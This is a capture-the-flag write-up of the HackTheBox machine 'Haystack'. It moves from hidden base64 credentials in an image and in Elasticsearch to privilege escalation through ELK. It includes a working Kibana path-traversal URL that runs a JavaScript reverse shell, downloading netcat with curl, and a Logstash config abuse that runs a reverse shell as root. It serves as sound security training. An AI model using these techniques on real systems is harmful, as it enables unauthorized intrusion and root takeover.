Haystack (HTB)
Haystack involves some CTF-ish steganography and searching around for initial access, researching the ELK (Elasticsearch-Logstash-Kibana) stack, understanding Grok, and using two different exploits to escalate privileges. There was a lot more to this box than I was expecting, given its “Easy” rating.
Initial Scan
When I visit port 80 in a browser, I get a webpage with nothing but needle.jpg.
When I visit port 9200, I find an Elasticsearch service.
To get user credentials, we need to dig into both of these ports.
Elasticsearch
To understand how to use Elasticsearch, I consulted the official reference guide. The gist of it is that you can search through a database using GET requests via either 1) the RESTful URL or 2) cURL with a JSON body. Everything here is simple enough to only leverage the first technique.
First I dump all the indices available by visiting http://10.10.10.115:9200/_cat/indices?v.
I check bank and .kibana, but in the end, the only useful one is quotes, a database of Spanish quotes.
An easy way to sift through everything is to query a search for the entire quotes database—and then use your browser’s native Ctrl + F functionality. So I use “size=253” to search for all 253 entries in the URL http://10.10.10.115:9200/quotes/_search?q=*&size=253. Here’s an example of searching for needle:
Queries for “password”, “username”, and other variants result in dead ends. Clearly there’s something else on the box I need before I can even know what I’m searching for.
The needle in the haystack
Back on port 80, we had that weird JPG of a needle. There’s nothing else in the source HTML of the page—and no results from fuzzing directories—but that port has to be good for something. So I run some steganography tools on the image. strings
reveals some peculiar base64.
Using CyberChef, the base64 decodes to:
In English, this translates to the needle in the haystack is “clave”.
Back on my Elasticsearch query (for all entries in the quotes database), I search for “clave” and find two results.
The first base64 string reveals a password.
The second shows the username.
I use the credentials to SSH in.
And I can grab the user flag.
Kibana LFI
To fully understand this box and how to exploit it, you have to research the ELK stack quite a bit, which includes Elasticsearch, Logstash, and Kibana. There’s a lot to dig through on this machine, but if you run LinEnum, you’ll find:
- There’s a service user called kibana.
- Port 5601 (Kibana) is open to localhost (but not to the outside world).
- A Kibana binary exists.
I find the version of Kibana.
If you search for exploits of this Kibana version (or, honestly, if you search for any popular Elasticsearch exploits), you’ll come across an LFI in the Kibana visualizer. There are some reference links in places like VulnDB and CVE, but the best step-by-step description I could find was from CyberArk.
In short, if you have access to the Kibana dashboard, you can use an LFI to trigger a JavaScript reverse shell payload.
The problem is, we don’t have access to this Kibana page (port 5601) from the outside. From my LinEnum output, I know that it’s running internally on the box, so I forward the port over to my Kali box.
To break down the syntax, I’m remotely forwarding port 9000 on my Kali box to port 5601 on the victim. So if I visit 127.0.0.1:9000 on my Kali’s web browser, I can access the Kibana dashboard (i.e., it forwards my HTTP request from 127.0.0.1:9000 to 10.10.10.115:5601).
Per the CyberArk article, this URL contains the LFI vulnerability: http://127.0.0.1:9000/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=es_6_0. I see the result in my browser.
This executes es_6_0.js. On the victim machine, es_6_0.js can be found in this directory:
Unfortunately, I couldn’t get other LFIs to work (such as viewing /etc/passwd). The CyberArk article seemed to imply you could only verify the results of a non-js LFI by viewing the logs, which the security user doesn’t seem to have access to.
So instead of working my way up, I went for reverse shell off the bat. I find a JavaScript shell from https://wiremask.eu/writeups/reverse-shell-on-a-nodejs-application/:
I serve it on Kali using Python SimpleHTTPServer and download it to /tmp (where I have write privileges) using curl
.
I set up my netcat listener on Kali.
In my browser, I navigate to http://127.0.0.1:9000/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../tmp/shell . Back on my listener, I get a connection back as the user kibana.
I upgrade to a Python shell.
Privilege escalation: Deciphering Logstash .conf files
If you run LinEnum.sh, you’ll find logstash
mentioned a few times (as a user and a running process as root). As this whole box seems to deal with the ELK stack, it makes sense to look into Logstash.
In /etc/logstash, you can find a directory called conf.d. conf.d holds some key Logstash config files.
I read into Logstash and how it uses these three configuration files.
- input.conf determines the conditions of the input file that Logstash will act on.
- filter.conf defines a regex that matches the contents of the input file.
- output.conf determines what actions will be taken on the input file.
Let’s take a look at each of these files.
input.conf
This tells us:
- The target file must be in /opt/kibana.
- The filename must start with “logstash_”.
- Logstash checks for an input file every 10 seconds.
- The file must be executable.
filter.conf
The contents of the input file must match the regex Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}.
output.conf
output.conf shows that the value of “comando” in our input.conf will be executed—but this will happen only if the command matches “comando” in the filter.conf’s regex.
Abusing the .conf files
According to LinEnum.sh, a (messy) peculiar process that contains a ton of Logstash references is running as root . . .
. . . so it’s a safe assumption that the command Logstash executes in output.conf will run as root.
My plan is to create a reverse shell payload in the target directory (from input.conf) that matches the regex in filter.conf. Logstash should attempt to execute it on its own (scanning set to 10-second regular intervals).
First, I verify I have write access to the path defined in input.conf.
As this is a Linux box, I’d want to try having a netcat payload in my input file, but there’s no netcat on the box.
I move to /tmp (as I can assume it’s writable), use curl -O
to get nc
onto the machine, and make it executable.
Now that we have netcat on the machine, we have to make sure our file content matches the regex in filter.conf.
Did you notice the “grok” in filter.conf? The regex is run through a Grok processor, so we can use a tool like this Grok debugger to ensure that our file contents will match.
Now with a matching expression, I can create my file. I set up a netcat listener on my Kali machine.
Then, on Haystack, I create the payload input file and name it logstash_test
.
I wait for a minute (oddly, not the 10 seconds defined in input.conf) and get a connection back on my Kali listener.
I’m root. I grab the flag in the /root directory.